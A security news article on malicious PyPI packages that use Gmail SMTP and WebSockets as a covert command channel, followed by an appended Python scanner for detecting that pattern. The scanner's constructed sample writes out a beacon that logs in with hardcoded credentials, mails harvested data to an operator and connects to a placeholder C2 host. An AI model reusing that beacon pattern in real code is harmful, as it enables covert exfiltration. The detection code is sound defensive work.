CyberSecurity news
securebulletin.com@Secure Bulletin
Attackers are increasingly turning to trusted services like Gmail and Google APIs to create stealthy command-and-control (C2) channels. This tactic allows them to mask malicious activities within legitimate network traffic, making detection and mitigation significantly harder. By leveraging platforms like Gmail and Google Drive, threat actors can embed their communications within encrypted channels provided by reputable services, bypassing many traditional security measures. These communications are encrypted by Gmail’s TLS, further complicating detection efforts.
A recent investigation by Socket's Threat Research Team uncovered a campaign using malicious Python packages to establish covert tunnels over Gmail's SMTP protocol, enabling attackers to exfiltrate data and execute remote commands without being noticed. Seven malicious PyPI packages, all following a "Coffin Codes" naming theme, were found abusing Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution. Once installed, these packages open an encrypted connection to Gmail's SMTP server using hardcoded credentials and send beacons and harvested information to attacker-controlled email addresses.
The identified packages include Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb. While the packages have been removed from PyPI, one of them was downloaded over 18,000 times before removal. The most advanced variants of the packages also establish outbound WebSocket connections, enabling attackers to issue commands, transfer files, and potentially gain deeper access into the victim's network. This highlights the ongoing risks posed by supply chain attacks and the exploitation of trusted cloud services.
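As an added defender-side illustration (not code from Socket, Secure Bulletin or the packages themselves), the following static check uses Python's ast module to flag the combination described above in a package's source: a connection to a gmail.com SMTP host, string-literal credentials passed to login(), and a WebSocket client import. The sample source is constructed for the example and does not reproduce any real package.

```python
import ast

# Constructed sample mimicking the behaviour described above: a hardcoded
# Gmail SMTP login plus an outbound WebSocket. Not real package code.
SAMPLE = '''
import smtplib, websocket
def beacon(info):
    s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    s.login("drop.account@gmail.com", "app-password-placeholder")
    s.sendmail("drop.account@gmail.com", "operator@gmail.com", info)
    websocket.create_connection("wss://c2.example.invalid/ws")
'''

SMTP_CTORS = {"SMTP", "SMTP_SSL"}
WS_MODULES = {"websocket", "websockets"}

def _str(node):
    """Return the value of a string literal node, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None

def scan_source(src):
    """Return the list of indicator tags found in one Python source file."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            if any(a.name.split(".")[0] in WS_MODULES for a in node.names):
                findings.append("websocket-import")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in WS_MODULES:
                findings.append("websocket-import")
        elif isinstance(node, ast.Call):
            # Handle both smtplib.SMTP_SSL(...) and a bare SMTP_SSL(...) import
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
            host = _str(node.args[0]) if node.args else None
            if name in SMTP_CTORS and host and host.endswith("gmail.com"):
                findings.append("gmail-smtp-connect")
            if name == "login" and len(node.args) >= 2 and all(_str(a) for a in node.args[:2]):
                findings.append("hardcoded-smtp-credentials")
    return findings

def is_suspicious(src):
    """True when a Gmail SMTP connection and hardcoded credentials both appear."""
    return {"gmail-smtp-connect", "hardcoded-smtp-credentials"} <= set(scan_source(src))

if __name__ == "__main__":
    print(scan_source(SAMPLE), is_suspicious(SAMPLE))
```

Running this over every .py file in a downloaded sdist or wheel before installation gives a cheap pre-install triage signal; it is a heuristic, so treat a hit as a reason to inspect, not as proof.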
Classification:
- HashTags: #C2 #Gmail #GoogleAPIs
- Company: Google
- Target: Internal dashboards, APIs, admin panels
- Product: Gmail, Google APIs
- Feature: C2 channels
- Type: Malware
- Severity: Major